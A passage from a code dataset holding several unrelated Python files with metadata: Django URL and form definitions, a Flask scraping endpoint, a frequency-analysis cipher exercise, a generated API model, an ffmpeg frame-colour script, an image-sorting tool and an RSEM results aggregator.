category\n\turl(r'^category/(?P[-\\w]+)/$', 'category_view',\n\t # {'template_name':'main/single_cat.html'},\n\t\tname='catalog_category'),\n\t# List of Porducts\n\turl(r'^product/(?P[-\\w]+)/$', 'product_view',\n\t\t{'template_name':'main/single_prod.html'},\n\t\tname='catalog_product'),\n\t#Search\n\turl(r'^search/$', 'prod_search',\n\t\t#{'template_name':'main/search.html'},\n\t\tname='catalog_search'),\n)\n\nfrom django.conf import settings\nurlpatterns += patterns('',\n\t(r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n)", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 994, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.urls.patterns", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "261820462", "text": "from flask import Flask, request, make_response, jsonify\r\nimport main_scrap\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/api/scrape_company', methods=['POST'])\r\ndef scrape_company():\r\n data = request.get_json() #data dans le body\r\n url = data[\"url\"] #url dans le body\r\n message = main_scrap.company_scraping(url)\r\n\r\n return message\r\n\r\n@app.route('/api/scrape_companies', methods=['GET'])\r\ndef scrape_companies():\r\n message = main_scrap.companies_scraping()\r\n\r\n return message\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app.run(debug=True)", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "main_scrap.company_scraping", "line_number": 16, "usage_type": "call"}, {"api_name": "main_scrap.companies_scraping", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "196465752", "text": "# Use frequency analysis to find the key to ciphertext.txt, and then\n# decode it.\n\n# Your code here\n\nfrequencies = \"\"\"\n| E | 11.53 |\n| T | 9.75 |\n| A | 8.46 |\n| O | 8.08 |\n| H | 7.71 |\n| N | 6.73 |\n| R | 6.29 |\n| I | 5.84 |\n| S | 5.56 |\n| D | 4.74 |\n| L | 3.92 |\n| W | 3.08 |\n| U | 2.59 |\n| G | 2.48 |\n| F | 2.42 |\n| B | 2.19 |\n| M | 2.18 |\n| Y | 2.02 |\n| C | 1.58 |\n| P | 1.08 |\n| K | 0.84 |\n| V | 0.59 |\n| Q | 0.17 |\n| J | 0.07 |\n| X | 0.07 |\n| Z | 0.03 |\n\"\"\"\nimport re\n\nletter_to_freq = {}\nfor row in frequencies.split(\"\\n\"):\n m = re.match(r\"\\|\\s+(?P[A-Z])\\s+\\|\\s+(?P\\d+\\.\\d+)\\s+|\", row)\n if m and m.group(\"letter\") and m.group(\"number\"):\n letter_to_freq[m.group(\"letter\")] = float(m.group(\"number\"))/100.\n\nfreq_to_letter = {v: k for k, v in letter_to_freq.items()}\n\nwith open(\"ciphertext.txt\") as f:\n text = f.read()\n\nfrom collections import defaultdict\nletter_counts = defaultdict(lambda: 0)\nfor letter in text:\n letter = letter.upper()\n if 'A' <= letter and letter <= 'Z':\n letter_counts[letter] += 1\n\ndef get_closest(freq):\n return min(freq_to_letter.keys(), key=lambda x: abs(x-freq))\n\ntotal = sum(x for x in letter_counts.values())\nfor letter, count in letter_counts.items():\n freq = count/total\n closest = freq_to_letter[get_closest(freq)].lower()\n text = text.replace(letter, closest)\n\nprint(text)\n", "sub_path": "applications/crack_caesar/crack_caesar.py", "file_name": "crack_caesar.py", "file_ext": "py", "file_size_in_byte": 1651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.match", "line_number": 38, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "523714767", "text": "#-*- coding: utf-8 -*-\nfrom django import forms\nfrom Etudiant.models import Etu\nfrom Matiere.models import Matiere\nfrom Annee.models import Annee\nfrom Semestre.models import Semestre\nfrom UE.models import UE\n\nclass FileForm(forms.Form):\n\tfichier = forms.FileField()\n\nclass SelectNote(forms.Form):\n\tdef __init__(self,*args,**kwargs):\n\t\tnotes = kwargs.pop('notes')\n\t\tsuper(SelectNote,self).__init__(*args,**kwargs)\n\t\tNoteChoices = [(note[0],note[1]) for note in notes]\n\t\tself.fields['select'] = forms.ChoiceField(widget=forms.Select(), choices=NoteChoices)\n\nclass RenseignerNote(forms.Form):\n\tdef __init__(self,*args,**kwargs):\n\t\tnotes = kwargs.pop('notes')\n\t\tsuper(RenseignerNote,self).__init__(*args,**kwargs)\n\n\t\tfor note in notes:\n\t\t\tprint(note)\n\t\t\tif note.valeur is None:\n\t\t\t\tself.fields[note.matiere.code] = forms.CharField(max_length=100,required=False)\n\t\t\telse:\n\t\t\t\tself.fields[note.matiere.code] = forms.CharField(max_length=100,required=False ,widget=forms.TextInput(attrs={'value': note.valeur}))\n\t\t\t\t\nclass CompleterResultat(forms.Form):\n\tdef __init__(self,*args,**kwargs):\n\t\tresSem = kwargs.pop('res')\n\t\tsuper(CompleterResultat,self).__init__(*args,**kwargs)\n\t\n\t\tif resSem.resultat_pre_jury is None:\n\t\t\tself.fields['Resultat pre-jury'] = forms.CharField(max_length=100,required=False)\n\t\telse:\n\t\t\tself.fields['Resultat pre-jury'] = forms.CharField(max_length=100,required=False ,widget=forms.TextInput(attrs={'value': resSem.resultat_pre_jury}))\n\n\t\tif resSem.resultat_jury is None:\n\t\t\tself.fields['Resultat jury'] = forms.CharField(max_length=100,required=False)\n\t\telse:\n\t\t\tself.fields['Resultat jury'] = forms.CharField(max_length=100,required=False ,widget=forms.TextInput(attrs={'value': resSem.resultat_jury}))\t", "sub_path": "Note/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1727, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.forms.Form", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 37, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 39, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 39, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 42, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 44, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "596416082", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n #index\n url(r'^$', 'index.views.index'),\n url(r'^main/', 'index.views.main'),\n url(r'^corporate/', 'index.views.corporate'),\n url(r'^bar/', 'index.views.bar'),\n url(r'^newyear/', 'index.views.newyear'),\n url(r'^hallmap/', 'index.views.hallmap'),\n url(r'^calc/', 'index.views.calc'),\n url(r'^photo/', 'index.views.photo'),\n url(r'^book/', 'index.views.book'),\n url(r'^contacts/', 'index.views.contacts'),\n url(r'^fastmessage/', 'index.views.fm'),\n #admin\n url(r'^admin/', include(admin.site.urls)),\n)\n", "sub_path": "core/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 3, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 3, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "604692650", "text": "# coding=utf-8\n\nimport urllib.request\nimport urllib.parse\nimport json\n\nurl = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule&smartresult=ugc&sessionFrom=null'\n\nhead = {}\nhead['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0'\n\ncontent = input(\"输入需要翻译的内容:\")\n\ndata = {}\ndata['action'] = 'FY_BY_CLICKBUTTON'\ndata['doctype'] = 'json'\ndata['i'] = content\ndata['keyfrom'] = 'fanyi.web'\ndata['type'] = 'AUTO'\ndata['typoResult'] = 'true'\ndata['ue'] = 'UTF-8'\ndata['xmlVersion'] = '1.8'\n\ndata = urllib.parse.urlencode(data).encode('utf-8')\n\nreq = urllib.request.Request(url, data, head)\nresponse = urllib.request.urlopen(req)\n\nhtml = response.read().decode('utf-8')\nresult = json.loads(html)\n\nprint('该翻译内容的结果是:' + result['translateResult'][0][0]['tgt'] + '\\n')\ntry:\n print('延伸翻译:')\n for i in result['smartResult']['entries']:\n print(i)\nexcept KeyError:\n print(\"找不到更多相关内容。\")", "sub_path": "Python_Store/Translate_youdao.py", "file_name": "Translate_youdao.py", "file_ext": "py", "file_size_in_byte": 1021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib.request.parse.urlencode", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.request.parse", "line_number": 24, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 24, "usage_type": "name"}, {"api_name": "urllib.request.request.Request", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 26, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 26, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 27, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 27, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 27, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "112095467", "text": "# coding: utf-8\n\n\"\"\"\n Memsource REST API\n\n Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](). # noqa: E501\n\n OpenAPI spec version: Latest\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom memsource_cli.models.comment_dto import CommentDto # noqa: F401,E501\nfrom memsource_cli.models.status_dto import StatusDto # noqa: F401,E501\n\n\nclass CommonConversationDto(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'date_created': 'datetime',\n 'date_modified': 'datetime',\n 'comments': 'list[CommentDto]',\n 'status': 'StatusDto',\n 'deleted': 'bool'\n }\n\n attribute_map = {\n 'id': 'id',\n 'date_created': 'dateCreated',\n 'date_modified': 'dateModified',\n 'comments': 'comments',\n 'status': 'status',\n 'deleted': 'deleted'\n }\n\n discriminator_value_class_map = {\n 'SEGMENT_TARGET': 'SEGMENTTARGET',\n 'LQA': 'LQA'\n }\n\n def __init__(self, id=None, date_created=None, date_modified=None, comments=None, status=None, deleted=None): # noqa: E501\n \"\"\"CommonConversationDto - a model defined in Swagger\"\"\" # noqa: E501\n\n self._id = None\n self._date_created = None\n self._date_modified = None\n self._comments = None\n self._status = None\n self._deleted = None\n self.discriminator = 'type'\n\n if id is not None:\n self.id = id\n if date_created is not None:\n self.date_created = date_created\n if date_modified is not None:\n self.date_modified = date_modified\n if comments is not None:\n self.comments = comments\n if status is not None:\n self.status = status\n if deleted is not None:\n self.deleted = deleted\n\n @property\n def id(self):\n \"\"\"Gets the id of this CommonConversationDto. # noqa: E501\n\n\n :return: The id of this CommonConversationDto. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this CommonConversationDto.\n\n\n :param id: The id of this CommonConversationDto. # noqa: E501\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def date_created(self):\n \"\"\"Gets the date_created of this CommonConversationDto. # noqa: E501\n\n\n :return: The date_created of this CommonConversationDto. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._date_created\n\n @date_created.setter\n def date_created(self, date_created):\n \"\"\"Sets the date_created of this CommonConversationDto.\n\n\n :param date_created: The date_created of this CommonConversationDto. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._date_created = date_created\n\n @property\n def date_modified(self):\n \"\"\"Gets the date_modified of this CommonConversationDto. # noqa: E501\n\n\n :return: The date_modified of this CommonConversationDto. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._date_modified\n\n @date_modified.setter\n def date_modified(self, date_modified):\n \"\"\"Sets the date_modified of this CommonConversationDto.\n\n\n :param date_modified: The date_modified of this CommonConversationDto. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._date_modified = date_modified\n\n @property\n def comments(self):\n \"\"\"Gets the comments of this CommonConversationDto. # noqa: E501\n\n\n :return: The comments of this CommonConversationDto. # noqa: E501\n :rtype: list[CommentDto]\n \"\"\"\n return self._comments\n\n @comments.setter\n def comments(self, comments):\n \"\"\"Sets the comments of this CommonConversationDto.\n\n\n :param comments: The comments of this CommonConversationDto. # noqa: E501\n :type: list[CommentDto]\n \"\"\"\n\n self._comments = comments\n\n @property\n def status(self):\n \"\"\"Gets the status of this CommonConversationDto. # noqa: E501\n\n\n :return: The status of this CommonConversationDto. # noqa: E501\n :rtype: StatusDto\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this CommonConversationDto.\n\n\n :param status: The status of this CommonConversationDto. # noqa: E501\n :type: StatusDto\n \"\"\"\n\n self._status = status\n\n @property\n def deleted(self):\n \"\"\"Gets the deleted of this CommonConversationDto. # noqa: E501\n\n\n :return: The deleted of this CommonConversationDto. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._deleted\n\n @deleted.setter\n def deleted(self, deleted):\n \"\"\"Sets the deleted of this CommonConversationDto.\n\n\n :param deleted: The deleted of this CommonConversationDto. # noqa: E501\n :type: bool\n \"\"\"\n\n self._deleted = deleted\n\n def get_real_child_model(self, data):\n \"\"\"Returns the real base class specified by the discriminator\"\"\"\n discriminator_value = data[self.discriminator].lower()\n return self.discriminator_value_class_map.get(discriminator_value)\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(CommonConversationDto, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CommonConversationDto):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n", "sub_path": "memsource_cli/models/common_conversation_dto.py", "file_name": "common_conversation_dto.py", "file_ext": "py", "file_size_in_byte": 7550, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "six.iteritems", "line_number": 218, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 243, "usage_type": "call"}]} +{"seq_id": "576884342", "text": "import re\nimport subprocess as sp\nimport sys\nimport time\n\nimport numpy as np\nfrom PIL import Image, ImageDraw\n\n# Timestamp so you can see how long it took\nstart_time = \"Script started at \" + time.strftime(\"%H:%M:%S\")\nprint(start_time)\n\n# input file (first argument)\nfilename = str(sys.argv[1])\noutfilename = re.sub(r\"\\W+\", \"\", filename) + \".png\"\n\n## Get the metadata for the file\n\nFFPROBE_BIN = r\"C:\\Users\\Nick\\Documents\\Programming\\ffmpeg\\bin\\ffprobe.exe\"\ncommand = [\n FFPROBE_BIN,\n \"-loglevel\",\n \"quiet\",\n \"-select_streams\",\n \"v:0\",\n \"-show_entries\",\n \"stream=width,height\",\n \"-show_format\",\n \"-of\",\n \"default=nk=1:nw=1\",\n \"1917.mkv\",\n]\n\noutput = sp.check_output(command).decode(\"utf-8\")\nmetadata = output.split(\"\\n\")\n\n# orig_width, orig_height = metadata[0], metadata[1]\nruntime = int(float(metadata[8]))\ntotal_frames = runtime * 24\nevery_n_frames = total_frames // 4096\n\n\nprint(\"Filename:\", filename)\nprint(\"Duration (s): \", runtime)\nprint(f\"Taking every {every_n_frames} frames\")\n\n###\n### This section: credit to http://zulko.github.io/blog/2013/09/27/read-and-write-video-frames-in-python-using-ffmpeg/\n\n# Open the video file. In Windows you might need to use FFMPEG_BIN=\"ffmpeg.exe\"; Linux/OSX should be OK.\nFFMPEG_BIN = r\"C:\\Users\\Nick\\Documents\\Programming\\ffmpeg\\bin\\ffmpeg.exe\"\ncommand = [\n FFMPEG_BIN,\n \"-threads\",\n \"16\",\n \"-i\",\n filename,\n \"-f\",\n \"image2pipe\",\n \"-pix_fmt\",\n \"rgb24\",\n \"-s\",\n \"320x200\", # downscale before processing for faster runtime\n \"-vcodec\",\n \"rawvideo\",\n \"-\",\n]\npipe = sp.Popen(command, stdout=sp.PIPE, bufsize=10 ** 8)\n\n# get the average rgb value of a frame\ndef draw_next_frame_rgb_avg(raw_frame):\n frame = np.fromstring(raw_frame, dtype=\"uint8\")\n frame = frame.reshape((320, 200, 3))\n rgb_avg = (\n int(np.average(frame[:, :, 0])),\n int(np.average(frame[:, :, 1])),\n int(np.average(frame[:, :, 2])),\n )\n return rgb_avg\n\n\n# Go through the pipe one frame at a time until it's empty; store each frame's RGB values in rgb_list\nrgb_list = []\nx = 1 # optional; purely for displaying how many frames were processed\nwhile True: # as long as there's data in the pipe, keep reading frames\n try:\n next_frame = pipe.stdout.read(320 * 200 * 3)\n except:\n print(\n \"No more frames to process (or error occurred). Number of frames processed:\",\n x,\n )\n break\n\n if len(next_frame) < (320 * 200 * 3):\n break\n\n x = x + 1\n if x % every_n_frames == 0:\n rgb_list.append(draw_next_frame_rgb_avg(next_frame))\n\n\n# create a new image width the same width as number of frames sampled,\n# and draw one vertical line per frame at x=frame number\nimage_height = 2160 # set image height to whatever you want; you could use int(len(rgb_list)*9/16) to make a 16:9 image for instance\nnew = Image.new(\"RGB\", (len(rgb_list), image_height))\ndraw = ImageDraw.Draw(new)\n# x = the location on the x axis of the next line to draw\nx_pixel = 1\nfor rgb_tuple in rgb_list:\n draw.line((x_pixel, 0, x_pixel, image_height), fill=rgb_tuple)\n x_pixel = x_pixel + 1\nnew.show()\nnew.save(outfilename, \"PNG\")\n\nprint(\"Script finished at \" + time.strftime(\"%H:%M:%S\"))\nprint(\"Frames\" + str(len(rgb_list)))\n", "sub_path": "process_video.py", "file_name": "process_video.py", "file_ext": "py", "file_size_in_byte": 3284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "time.strftime", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 15, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 34, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 68, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.fromstring", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 106, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 107, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 107, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "186610263", "text": "\"\"\"Sort the files based on user input.\"\"\"\n\nimport cv2\nimport os\nimport glob\nimport argparse\nimport shutil\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--folder\", required=True, help=\"Folder to sort\")\nap.add_argument(\"-s\", \"--start\",\n nargs='?',\n const=1,\n help=\"Start image #\",\n type=int)\nargs = vars(ap.parse_args())\npath = args[\"folder\"]\nstart = args[\"start\"]\n\nif path[-1] is not \"/\":\n path += \"/\"\nif not os.path.exists(path):\n print(\"Invalid path: {}\".format(path))\n exit()\nif not os.path.exists(path + \"True\"):\n os.makedirs(path + \"True\")\nif not os.path.exists(path + \"False\"):\n os.makedirs(path + \"False\")\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nif start is None:\n start = 1\ni = start\nfilenames = glob.glob(path+\"*.png\")\nfile_lables = []\nfor filename in filenames:\n file_lables.append(0)\n\nwhile True:\n print(\"Current image number is: \"+str(i))\n img = cv2.imread(filenames[i], -1)\n if file_lables[i] is 1:\n cv2.putText(img, (\"Labled as 'True'\"),\n (20, 40), font, 1, (255, 255, 255), 2, cv2.LINE_AA)\n if file_lables[i] is -1:\n cv2.putText(img, (\"Labled as 'False'\"),\n (10, 40), font, 1, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.imshow((\"Is it clear? Right Shift = True,\"\n \"? = False, Enter = Finalize, \"\n \"- = Go back, + = Go forward\"),\n img[::2, ::2, ::])\n k = cv2.waitKey(0) & 0xFF\n if k == 45 and i > 0:\n i -= 1\n if k == 61 and i < (len(filenames) - 1):\n i += 1\n if k == 226:\n file_lables[i] = 1\n if i < (len(filenames) - 1):\n i += 1\n if k == 47:\n file_lables[i] = -1\n if i < (len(filenames) - 1):\n i += 1\n print(k)\n if k == 27:\n exit()\n if k == 13:\n break\nfor index, filename in enumerate(filenames):\n TruePath = filename.replace(path, path+\"True/\")\n FalsePath = filename.replace(path, path+\"False/\")\n if file_lables[index] > 0:\n print(\"Copying {} to {}\".format(filename, TruePath))\n shutil.copyfile(filename, TruePath)\n if file_lables[index] < 0:\n print(\"Copying {} to {}\".format(filename, FalsePath))\n shutil.copyfile(filename, FalsePath)\n", "sub_path": "man_sort.py", "file_name": "man_sort.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 30, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 75, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "566164035", "text": "import sys,argparse\nimport os,glob,re\nimport numpy as np\nimport pandas as pd\n\n\ndef main(indir,outdir):\n\n os.makedirs(outdir,exist_ok=True)\n mapping_dirs = glob.glob(indir+'/*')\n out_count = pd.DataFrame()\n out_tpm = pd.DataFrame()\n out_fpkm = pd.DataFrame()\n \n for mapping_dir in sorted(mapping_dirs):\n sample_id = os.path.basename(mapping_dir)\n print(mapping_dir,sample_id)\n # ==== mapping rate\n expr_file = mapping_dir+os.sep+'/{}_rsem.genes.results'.format(sample_id)\n with open(expr_file) as expr_f:\n expr_df = pd.read_csv(expr_f,sep='\\t',index_col=0)\n out_count = pd.concat([out_count,expr_df['expected_count'].rename(sample_id)],axis=1)\n out_tpm = pd.concat([out_tpm,expr_df['TPM'].rename(sample_id)],axis=1)\n out_fpkm = pd.concat([out_fpkm,expr_df['FPKM'].rename(sample_id)],axis=1)\n\n out_count.to_csv(outdir+os.sep+'expected_count.csv')\n out_tpm.to_csv(outdir+os.sep+'tpm.csv')\n out_fpkm.to_csv(outdir+os.sep+'fpkm.csv')\n\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n #parser.add_argument('-i', '--infile', action = 'store', type = str,dest = 'infile', help = 'input file of', metavar = '')\n# parser.add_argument('-o','--outfile', action = 'store', type = str,dest = 'outfile', help = 'outfile of', metavar = '')\n parser.add_argument('-i', '--indir', action = 'store', type = str,dest = 'indir', help = 'input dir of salmon results', metavar = '')\n parser.add_argument('-o','--outdir', action = 'store', type = str,dest = 'outdir', help = 'outdir of ,default: current dir', metavar = '',default='./')\n #parser.add_argument('-s','--species', action = 'store', type = str,dest = 'species', help = 'species used to choose correct chromosome, e.g., hg38 or mm10', metavar = '',required=True)\n \n\n args = parser.parse_args()\n if(len(sys.argv))<5:\n parser.print_help()\n sys.exit(1)\n \n 